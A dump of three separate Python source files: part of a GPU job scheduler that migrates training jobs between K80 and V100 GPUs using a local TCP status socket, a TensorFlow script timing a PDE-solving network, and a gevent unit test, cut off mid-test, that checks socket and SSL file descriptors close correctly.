finish_dict[job_name] = 0
epoch_waste_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
epoch_waste_dict[job_name] = 0
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
global K80_start_time
global V100_start_time, promote_start_time
global K80_job
global v100_job
global K80_time
global V100_time
global ovhd_a, ovhd_b, ovhd_c, ovhd_d, k80_1st, v100_1st, ovhd_start, overhead, ovhd_total
global b_start, c_start, d_start, completion
if 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
finish_dict[job_name] = 1
JCT[job] = int(time.time() - job_start[job])
if job in list(K80_job.values()):
K80_time[job] += int(time.time() - K80_start_time[job])
elif job in list(V100_job.values()):
V100_time[job] += int(time.time() - V100_start_time[job])
elif 'pid' in data_str:
global pid_dict
job_name = data_str.split(' ')[0]
pid = data_str.split(' ')[2]
pid_dict[job_name] = pid
elif 'checkpoint' in data_str: # can only be received after save signal is sent
global checkpoint_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
checkpoint_dict[job_name] = 1
ovhd_a[job].append(int(time.time() - ovhd_start[job]))
b_start[job] = time.time()
elif 'waste' in data_str:
global epoch_waste_dict
job_name = data_str.split(' ')[0]
epoch_waste_time = data_str.split(' ')[2]
epoch_waste_dict[job_name] += int(epoch_waste_time)
elif 'b_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_b[job].append(int(time.time() - b_start[job]))
c_start[job] = time.time()
elif 'c_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_c[job].append(int(time.time() - c_start[job]))
d_start[job] = time.time()
elif 'd_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_d[job].append(int(time.time() - d_start[job]))
ovhd_total[job].append(int(time.time() - ovhd_start[job]))
if ovhd_start[job] != 0:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
if job in list(K80_job.values()):
K80_start_time[job] = time.time()
elif job in list(V100_job.values()):
V100_start_time[job] = time.time()
promote_start_time[job] = time.time()
elif '1st_epoch' in data_str: # 'job50 1st_epoch 35'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
epoch_time = int(data_str.split(' ')[2])
if job in list(K80_job.values()):
k80_1st[job].append(epoch_time)
elif job in list(V100_job.values()):
v100_1st[job].append(epoch_time)
elif 'completion' in data_str: # 'job50 completion 0.33'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
completion_portion = float(data_str.split(' ')[2])
completion[job] = completion_portion
if 'ckpt_qual' in data_str or 'finish' in data_str or 'checkpoint' in data_str:
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
if job in demote_list:
demote_list.remove(job)
################ check step1 finished job of K80 jobs and step 2 of V100 #################
check_step1_complete(list(V100_job.values()))
check_step2_complete(list(K80_job.values()))
for job in list(V100_job.values()):
if job not in qualified_job and job != 'idle':
if job in step1_job:
kill_job(V100_node, job)
qualified_job.append(job)
print('job' + job + ' has been qualified for demotion')
time.sleep(3) # wait for run.sh to finish
x1, x3 = gpu_pwr.process_csv('job'+job)
x2 = 3600 / V100_epoch_time[job]
speedup_pred = model.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100
speedup_dict[job] = speedup_pred
predict_dict[job] = speedup_pred
############### record number of newly arrived jobs ################
new_arrival = 0
index_cpy = index
while True:
time_passed = int(time.time() - queue_timer)
if index_cpy >= len(queue):
break
elif time_passed >= queue_dict[queue[index_cpy]]:
new_arrival += 1
index_cpy += 1
elif time_passed < queue_dict[queue[index_cpy]]:
break
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
if new_arrival == 0:
# this returns available jobs for promotion. Has to be qualified, and currently in K80, but not practically complete
promote_list = list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
else:
promote_list = []
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
# look at demote list
for gpu, job in V100_job.items():
if job != 'idle':
if job not in demote_list and job in step2_job and len(ovhd_total[job]) > 0:
job_speedup = speedup_dict[job] # 0.7
job_ovhd = np.mean(ovhd_total[job]) # 100
k80_1st_ovhd = np.mean(k80_1st[job]) - K80_epoch_time[job]
v100_1st_ovhd = np.mean(v100_1st[job]) - V100_epoch_time[job]
demote_qualify_time = (2 * job_ovhd + k80_1st_ovhd + v100_1st_ovhd) / job_speedup
if int(time.time() - promote_start_time[job]) > demote_qualify_time:
demote_list.append(job)
print('job' + job + 'qualified for demote for passing demote qualify time ' +
str(int(demote_qualify_time)))
elif job not in demote_list and job not in step2_job and job in qualified_job:
demote_list.append(job)
print('job' + job + 'qualified for demote for profiling')
if len(promote_list) > 0 or len(demote_list) > 0:
if new_arrival == 0:
promoted, demoted = max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote)
else:
promoted, demoted = min_speedup_demotion(K80_job, demote_list)
if len(demoted) - len(promoted) > new_arrival - V100_free:
# demote only # of new arrivals + # of promoted
print('some demoted canceled because more demoted than new arrival + promoted, arrival = ' +
str(new_arrival))
print('original demotion: ' + str(demoted))
demoted_pool = {}
for job in demoted:
if job in speedup_dict:
demoted_pool[job] = speedup_dict[job]
demoted = sorted(demoted_pool, key=demoted_pool.get, reverse=False)[:(len(promoted)+new_arrival-V100_free)]
print('new demotion: ' + str(demoted))
if len(promoted) > 0:
if new_arrival == 0:
print('no new job arrivals')
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
checkpoint_finish_check = []
for gpu, job in K80_job.items():
if job in promoted:
save_job(K80_node, job)
if finish_dict['job'+job] != 1:
K80_time[job] += int(time.time() - K80_start_time[job])
checkpoint_finish_check.append(job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
# make sure demoted step1 job doesn't get promoted back before finishing profiling
if job in step1_job and job not in step2_job:
speedup_dict[job] = 0.01
save_job(V100_node, job)
if finish_dict['job'+job] != 1:
V100_time[job] += int(time.time() - V100_start_time[job])
checkpoint_finish_check.append(job)
V100_job[gpu] = 'idle'
V100_used -= 1
demote_list.remove(job)
# wait for all GPUs to be available
if len(checkpoint_finish_check) > 0:
while True:
time.sleep(5)
for job in checkpoint_finish_check[:]:
if checkpoint_dict['job'+job] == 1: # checkpoint has finished, gpu is free
print(job + ' checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
checkpoint_finish_check.remove(job)
# also check if job already finished before sending checkpoint signal
elif finish_dict['job'+job] == 1:
print(job + ' finished before receiving checkpoint signal')
checkpoint_finish_check.remove(job)
if len(checkpoint_finish_check) == 0:
break
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
V100_job[gpu] = job_new
resume_job(V100_node, gpu, job_new)
num_mig[job_new] += 1
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
print('job'+job_new+' has finished before checkpointing')
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
################ submit new jobs to vacant K80 GPUs ############################
# check if there are vacant K80s
## yes: submit jobs from queue
## no: do nothing
if not all_jobs_started:
if V100_used < V100_cap:
V100_free = V100_cap - V100_used
for i in range(V100_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in V100_job.items():
if job == 'idle': # schedule new job here if idle
start_job(V100_node, gpu, job_new)
measure_job(V100_node, gpu, job_new)
V100_job[gpu] = job_new
job_start[job_new] = time.time()
V100_start_time[job_new] = time.time()
index += 1
V100_used += 1
time.sleep(5) # don't communicate too often
break
elif index >= len(queue):
all_jobs_started = True
############## monitor GPU usage ############
usage = K80_used + V100_used
time_stamp = int(time.time() - queue_timer)
gpu_usage_time.append(time_stamp)
gpu_usage.append(usage)
total_completion = np.sum(list(completion.values()))
gpu_usage_completion.append(total_completion)
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
print('finished all runs')
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
K80_time_name = testcase + '_K80_time.json'
V100_time_name = testcase + '_V100_time.json'
gpu_usage_name = testcase + '_gpu_usage.csv'
ovhd_a_name = testcase + '_ovhd_a.json'
ovhd_b_name = testcase + '_ovhd_b.json'
ovhd_c_name = testcase + '_ovhd_c.json'
ovhd_d_name = testcase + '_ovhd_d.json'
ovhd_total_name = testcase + '_ovhd_total.json'
k80_1st_name = testcase + '_k80_1st.json'
v100_1st_name = testcase + '_v100_1st.json'
speedup_name = 'speedup.json'
predict_name = 'predict.json'
demote_list_name = 'demote_list.json'
completion_name = 'completion.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
with open(K80_time_name, 'w') as fp3:
json.dump(K80_time, fp3, sort_keys=True, indent=4)
with open(V100_time_name, 'w') as fp3:
json.dump(V100_time, fp3, sort_keys=True, indent=4)
with open(ovhd_a_name, 'w') as fp3:
json.dump(ovhd_a, fp3, sort_keys=True, indent=4)
with open(ovhd_b_name, 'w') as fp3:
json.dump(ovhd_b, fp3, sort_keys=True, indent=4)
with open(ovhd_c_name, 'w') as fp3:
json.dump(ovhd_c, fp3, sort_keys=True, indent=4)
with open(ovhd_d_name, 'w') as fp3:
json.dump(ovhd_d, fp3, sort_keys=True, indent=4)
with open(ovhd_total_name, 'w') as fp3:
json.dump(ovhd_total, fp3, sort_keys=True, indent=4)
with open(k80_1st_name, 'w') as fp3:
json.dump(k80_1st, fp3, sort_keys=True, indent=4)
with open(v100_1st_name, 'w') as fp3:
json.dump(v100_1st, fp3, sort_keys=True, indent=4)
with open(speedup_name, 'w') as fp1:
json.dump(speedup_dict, fp1, sort_keys=True, indent=4)
with open(predict_name, 'w') as fp1:
json.dump(predict_dict, fp1, sort_keys=True, indent=4)
with open(demote_list_name, 'w') as fp1:
json.dump(demote_list, fp1, sort_keys=True, indent=4)
with open(completion_name, 'w') as fp1:
json.dump(completion, fp1, sort_keys=True, indent=4)
gpu_usage_time = np.asarray(gpu_usage_time)
gpu_usage = np.asarray(gpu_usage)
gpu_usage_completion = np.asarray(gpu_usage_completion)
rows = zip(gpu_usage_time, gpu_usage, gpu_usage_completion)
with open(gpu_usage_name, 'w') as f:
writer = csv.writer(f)
for row in rows:
writer.writerow(row)
|
Time_Network.py
|
import argparse
import numpy as np
import tensorflow as tf
#from reader_frozen import plot_prediction, convert_time, read_data, read_mesh, read_soln
import os
import sys
import time
import multiprocessing
import threading
import csv
# Import flags specifying dataset parameters
from timer_flags import getFlags
DATA_COUNT = 10*20*50
#DATA_COUNT = 5000
increment = 1000
batch_size = 250
#batches = 4
MODEL_DIR = "/home/nick/Research/ConvPDE/Poisson_Circle/Model_1/"
SETUP_DIR = "./"
data_dir = "Data/"
mesh_dir = "Meshes/"
soln_dir = "Solutions/"
# Load graph from frozen .pb file
def load_graph(frozen_model_folder):
#frozen_graph_filename = frozen_model_folder + "frozen_model.pb"
frozen_graph_filename = frozen_model_folder + "optimized_frozen_model.pb"
with tf.gfile.GFile(frozen_graph_filename, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(
graph_def,
input_map=None,
return_elements=None,
name="prefix",
producer_op_list=None
)
return graph
## Neural Network
def network_times():
parser = argparse.ArgumentParser()
parser.add_argument("--model_dir", default=MODEL_DIR, type=str, help="Model folder to export")
parser.add_argument("--DATA_dir", default=SETUP_DIR, type=str, help="Folder containing dataset subdirectories")
parser.add_argument("--default_res", default=128, type=int, help="Resolution of data")
parser.add_argument("--ID", default=0, type=int, help="ID to plot")
parser.add_argument("--slice_plot", default=False, action="store_true", help="Plot a slice of the prediction/solution")
parser.add_argument("--show_error", default=False, action="store_true", help="Plot the error between the prediction and solution")
parser.add_argument("--use_hires", default=False, action="store_true", help="Option to use high resolution data")
parser.add_argument("--no_gpu", default=False, action="store_true", help="Specify if GPU is not being used")
parser.add_argument("--save_solutions", default=False, action="store_true", help="Option to save solutions to file")
parser.add_argument("--time_count", default=1, type=int, help="Time count for time tests")
args = parser.parse_args()
default_res = args.default_res
DATA_dir = args.DATA_dir
slice_plot = args.slice_plot
show_error = args.show_error
graph = load_graph(args.model_dir)
ID = args.ID
USE_HIRES = args.use_hires
NO_GPU = args.no_gpu
time_count = args.time_count
save_solutions = args.save_solutions
# Display operators defined in graph
#for op in graph.get_operations():
#print(op.name)
# Define input and output nodes
data = graph.get_tensor_by_name('prefix/data_test:0')
mesh = graph.get_tensor_by_name('prefix/mesh_test:0')
soln = graph.get_tensor_by_name('prefix/soln_test:0')
y_pred = graph.get_tensor_by_name('prefix/masked_pred_test:0')
y_scale = graph.get_tensor_by_name('prefix/masked_scale_test:0')
with tf.Session(graph=graph) as sess:
# Run initial session to remove graph loading time
"""
# Read mesh and data files
source = read_data(0, os.path.join(DATA_dir,data_dir), USE_HIRES=USE_HIRES)
data_batch = np.expand_dims(np.transpose(source, (1, 2, 0)),0)
mesh_data = read_mesh(0, os.path.join(DATA_dir,mesh_dir), USE_HIRES=USE_HIRES)
mesh_batch = np.expand_dims(np.transpose(mesh_data, (1, 2, 0)),0)
# Compute network prediction
y_out = sess.run(y_pred, feed_dict={
data: data_batch,
mesh: mesh_batch,
soln: data_batch
#soln: soln_batch
})
"""
batches = int(time_count*increment/batch_size)
#for count, batches in enumerate([int(n*increment/batch_size) for n in range(1,11)]):
for _ in range(0,1):
#count = 0
#batches = int(DATA_COUNT/batch_size)
# Start count at 1
#count += 1
#print("\n [ Loading Data ] \n")
#indices = np.array([n for n in range(0,DATA_COUNT)])
indices = np.array([n for n in range(0,int(time_count*increment))])
data_batches = []
mesh_batches = []
#soln_batches = []
start = time.perf_counter()
#mesh_array = np.load(mesh_dir + "Meshes.npy")
#data_array = np.load(data_dir + "Data.npy")
mesh_array = np.load(mesh_dir + "Meshes_0.npy")
data_array = np.load(data_dir + "Data_0.npy")
for n in range(1,time_count):
tmp_mesh_array = np.load(mesh_dir + "Meshes_" + str(n) + ".npy")
tmp_data_array = np.load(data_dir + "Data_" + str(n) + ".npy")
mesh_array = np.concatenate([mesh_array, tmp_mesh_array], axis=0)
data_array = np.concatenate([data_array, tmp_data_array], axis=0)
mesh_batches = np.split(mesh_array, batches, axis=0)
data_batches = np.split(data_array, batches, axis=0)
"""
def load_batch(n,dlist,mlist,tinds):
data_batch, mesh_batch = get_batch(n, batch_size, indices)
dlist.append(data_batch)
mlist.append(mesh_batch)
tinds.append(n)
remaining_batches = batches
step = 0
tinds = []
# Specify number of threads for loading data
THREADS = 8
while remaining_batches > 0:
sys.stdout.write(" Batch %d of %d\r" %(batches-remaining_batches+1, batches))
sys.stdout.flush()
THREADS = np.min([THREADS, remaining_batches])
threadList = []
for n in range(step,step+THREADS):
threadList.append(threading.Thread(target=load_batch, args=(n,data_batches,mesh_batches,tinds)))
for t in threadList:
t.start()
for t in threadList:
t.join()
step += THREADS
remaining_batches -= THREADS
sys.stdout.write(" Batch %d of %d\r" %(batches, batches))
sys.stdout.flush()
permute = np.argsort(np.array(tinds)).tolist()
data_batches = [data_batches[i] for i in permute]
mesh_batches = [mesh_batches[i] for i in permute]
#data_batches = np.reshape(np.array(data_batches)[permute], [-1,default_res,default_res,1])
#mesh_batches = np.reshape(np.array(mesh_batches)[permute], [-1,default_res,default_res,1])
"""
"""
for n in range(0,batches):
sys.stdout.write(" Batch %d of %d\r" %(n+1, batches))
sys.stdout.flush()
#data_batch, mesh_batch, soln_batch = get_batch(n, batch_size, indices)
data_batch, mesh_batch = get_batch(n, batch_size, indices)
data_batches.append(data_batch)
mesh_batches.append(mesh_batch)
#soln_batches.append(soln_batch)
"""
end = time.perf_counter()
load_time = end - start
#print("\n\nLoad Time: %.5f seconds" %(load_time))
#print("\n")
if NO_GPU:
print("\n [ Evaluating Network {:} ] \n".format(time_count))
else:
print("\n [ Evaluating Network (GPU) {:} ] \n".format(time_count))
start = time.perf_counter()
#for data_batch, mesh_batch, soln_batch in data:
for n in range(0, batches):
data_batch = data_batches[n]
mesh_batch = mesh_batches[n]
#soln_batch = soln_batches[n]
# SCALE INPUT DATA
scaling_factors = np.amax(np.abs(data_batch), axis=(1,2,3))[:,np.newaxis,np.newaxis,np.newaxis]
data_batch = data_batch/scaling_factors
sys.stdout.write(" Batch %d of %d\r" %(n+1, batches))
sys.stdout.flush()
# Compute network prediction
y_out, y_s = sess.run([y_pred, y_scale], feed_dict={
data: data_batch,
mesh: mesh_batch,
soln: data_batch
#soln: soln_batch
})
# RESCALE OUTPUT DATA
y_out = y_out * scaling_factors
if save_solutions:
batch_indices = [k for k in range(n*batch_size, (n+1)*batch_size)]
batch_IDs = indices[batch_indices]
for ID in batch_IDs:
filename = "./Solutions/network_solution_" + str(ID) + ".npy"
np.save(filename, y_out[ID - n*batch_size,:,:,0])
end = time.perf_counter()
## TIMES WITHOUT LOADING
#total_time = end - start
#batch_time = total_time / batches
#average_time = batch_time / batch_size
#print("\nTotal Time: %.5f seconds" %(total_time))
#print("\nBatch Time: %.5f seconds" %(batch_time))
#print("\nAverage Time: %.5f seconds" %(average_time))
## TIMES INCLUDING LOADING
ltotal_time = (end - start) + load_time
lbatch_time = ltotal_time / batches
laverage_time = lbatch_time / batch_size
#print("\n\n")
#print(" SOLVE TIMES:\n")
#print("\n - Total Time: %.5f seconds" %(ltotal_time))
#print(" - Batch Time: %.5f seconds" %(lbatch_time))
print(" ( Average Time: %.5f seconds )\n" %(laverage_time))
if NO_GPU:
filename = "Network_Times_NO_GPU.csv"
else:
filename = "Network_Times.csv"
## Remove pre-existing file
#if os.path.exists(filename):
# os.remove(filename)
with open(filename, 'a') as csvfile:
#csvfile.write("Total Time: %.5f\n" %(total_time))
#csvfile.write("Batch Time: %.5f\n" %(batch_time))
#csvfile.write("Average Time: %.5f\n" %(average_time))
#csvfile.write("\nWITH LOADING:")
#csvfile.write("Total Time: %.5f\n" %(ltotal_time))
#csvfile.write("Batch Time: %.5f\n" %(lbatch_time))
#csvfile.write("Average Time: %.5f\n" %(laverage_time))
csvfile.write("%d %.7f %.7f %.7f\n" %(int((time_count)*increment), ltotal_time, lbatch_time, laverage_time))
#csvfile.write("%d %.7f %.7f %.7f\n" %(DATA_COUNT, ltotal_time, lbatch_time, laverage_time))
# Evaluate network on specified input data and plot prediction
if __name__ == '__main__':
network_times()
|
test__makefile_ref.py
|
from __future__ import print_function
import os
from gevent import monkey; monkey.patch_all()
import re
import socket
import ssl
import threading
import unittest
import errno
dirname = os.path.dirname(os.path.abspath(__file__))
certfile = os.path.join(dirname, '2.7/keycert.pem')
pid = os.getpid()
import sys
PY3 = sys.version_info[0] >= 3
fd_types = int
if PY3:
long = int
fd_types = (int, long)
WIN = sys.platform.startswith("win")
from greentest import get_open_files
try:
import psutil
except ImportError:
psutil = None
class Test(unittest.TestCase):
extra_allowed_open_states = ()
def tearDown(self):
self.extra_allowed_open_states = ()
unittest.TestCase.tearDown(self)
def assert_raises_EBADF(self, func):
try:
result = func()
except (socket.error, OSError) as ex:
# Windows/Py3 raises "OSError: [WinError 10038]"
if ex.args[0] == errno.EBADF:
return
if WIN and ex.args[0] == 10038:
return
raise
raise AssertionError('NOT RAISED EBADF: %r() returned %r' % (func, result))
def assert_fd_open(self, fileno):
assert isinstance(fileno, fd_types)
open_files = get_open_files()
if fileno not in open_files:
raise AssertionError('%r is not open:\n%s' % (fileno, open_files['data']))
def assert_fd_closed(self, fileno):
assert isinstance(fileno, fd_types), repr(fileno)
assert fileno > 0, fileno
open_files = get_open_files()
if fileno in open_files:
raise AssertionError('%r is not closed:\n%s' % (fileno, open_files['data']))
def _assert_sock_open(self, sock):
# requires the psutil output
open_files = get_open_files()
sockname = sock.getsockname()
for x in open_files['data']:
if getattr(x, 'laddr', None) == sockname:
assert x.status in (psutil.CONN_LISTEN, psutil.CONN_ESTABLISHED) + self.extra_allowed_open_states, x.status
return
raise AssertionError("%r is not open:\n%s" % (sock, open_files['data']))
def assert_open(self, sock, *rest):
if isinstance(sock, fd_types):
if not WIN:
self.assert_fd_open(sock)
else:
fileno = sock.fileno()
assert isinstance(fileno, fd_types), fileno
sockname = sock.getsockname()
assert isinstance(sockname, tuple), sockname
if not WIN:
self.assert_fd_open(fileno)
else:
self._assert_sock_open(sock)
if rest:
self.assert_open(rest[0], *rest[1:])
def assert_closed(self, sock, *rest):
if isinstance(sock, fd_types):
self.assert_fd_closed(sock)
else:
# Under Python3, the socket module returns -1 for a fileno
# of a closed socket; under Py2 it raises
if PY3:
self.assertEqual(sock.fileno(), -1)
else:
self.assert_raises_EBADF(sock.fileno)
self.assert_raises_EBADF(sock.getsockname)
self.assert_raises_EBADF(sock.accept)
if rest:
self.assert_closed(rest[0], *rest[1:])
def make_open_socket(self):
s = socket.socket()
s.bind(('127.0.0.1', 0))
if WIN:
# Windows doesn't show as open until this
s.listen(1)
self.assert_open(s, s.fileno())
return s
class TestSocket(Test):
def test_simple_close(self):
s = self.make_open_socket()
fileno = s.fileno()
s.close()
self.assert_closed(s, fileno)
def test_makefile1(self):
s = self.make_open_socket()
fileno = s.fileno()
f = s.makefile()
self.assert_open(s, fileno)
s.close()
# Under python 2, this closes socket wrapper object but not the file descriptor;
# under python 3, both stay open
if PY3:
self.assert_open(s, fileno)
else:
self.assert_closed(s)
self.assert_open(fileno)
f.close()
self.assert_closed(s)
self.assert_closed(fileno)
def test_makefile2(self):
s = self.make_open_socket()
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s)
self.assert_open(s, fileno)
f.close()
# closing fileobject does not close the socket
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_server_simple(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket)
finally:
t.join()
listener.close()
def test_server_makefile1(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
client_socket.close()
# Under python 2, this closes socket wrapper object but not the file descriptor;
# under python 3, both stay open
if PY3:
self.assert_open(client_socket, fileno)
else:
self.assert_closed(client_socket)
self.assert_open(fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
def test_server_makefile2(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
# closing fileobject does not close the socket
f.close()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
class TestSSL(Test):
def test_simple_close(self):
s = self.make_open_socket()
fileno = s.fileno()
s = ssl.wrap_socket(s)
fileno = s.fileno()
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_makefile1(self):
s = self.make_open_socket()
fileno = s.fileno()
s = ssl.wrap_socket(s)
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s, fileno)
s.close()
self.assert_open(s, fileno)
f.close()
self.assert_closed(s, fileno)
def test_makefile2(self):
s = self.make_open_socket()
fileno = s.fileno()
s = ssl.wrap_socket(s)
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s, fileno)
f.close()
# closing fileobject does not close the socket
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_server_simple(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
ssl.wrap_socket(connector)
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
def test_server_makefile1(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
ssl.wrap_socket(connector)
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_open(client_socket, fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
connector.close()
def test_server_makefile2(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
ssl.wrap_socket(connector)
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
# Closing fileobject does not close SSLObject
f.close()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
connector.close()
def test_serverssl_makefile1(self):
listener = socket.socket()
fileno = listener.fileno()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
listener = ssl.wrap_socket(listener, keyfile=certfile, certfile=certfile)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
ssl.wrap_socket(connector)
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_open(client_socket, fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
connector.close()
def test_serverssl_makefile2(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
listener = ssl.wrap_socket(listener, keyfile=certfile, certfile=certfile)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
s = ssl.wrap_socket(connector)
s.sendall(b'test_serverssl_makefile2')
s.close()
connector.close()
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
